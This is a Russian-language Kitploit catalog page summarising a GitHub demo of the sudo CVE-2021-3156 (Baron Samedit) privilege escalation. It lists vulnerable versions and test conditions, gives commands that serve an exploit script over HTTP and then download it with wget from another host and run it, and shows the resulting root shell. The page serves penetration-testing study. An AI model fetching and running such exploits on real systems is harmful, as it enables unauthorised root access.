Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
Инструменты/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
481 год назадЕщё не проверено

👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo

📅 Дата: 2025-06-08
✍️ Автор: @TopskiyPavelQwertyGang 🧠 Security Researcher | Red Team Enthusiast


🧠 CVE Overview

  • CVE-ID: CVE-2021-3156
  • Тип: Heap-based Buffer Overflow
  • Компонент: sudoedit (sudo)
  • Уровень доступа: Local
  • Цель: Получение root-привилегий

🧠 Описание

Heap-overflow в sudoedit даёт возможность локальному пользователю получить root-доступ
при выполнении команды sudoedit с заранее подготовленными параметрами.

Эксплуатация активна для версий sudo < 1.9.5p2, включая популярные образы Ubuntu/Debian/CentOS.
Даже при включённом ASLR уязвимость остаётся эксплуатируемой.


🐾 Условия эксплуатации

OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 Подготовка окружения

  1. Проверены версии glibc и sudo:
ldd --version
sudo --version
  1. Переданы PoC-скрипты с другой машины через встроенный HTTP-сервер:
python3 -m http.server 80
  1. На целевой машине PoC скачиваются и исполняются:
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Успешная эксплуатация Poс

$ python3 exploit_nss.py
# whoami
root

🧾 Заключение

Эксплуатация CVE-2021-3156 остаётся возможной даже при активном ASLR, если glibc ≥ 2.26 и sudo уязвимой версии.
Наиболее стабильным оказался эксплойт exploit_nss.py, срабатывающий с первого раза при корректной конфигурации NSS.

🧨 Система под контролем.


Скачать инструмент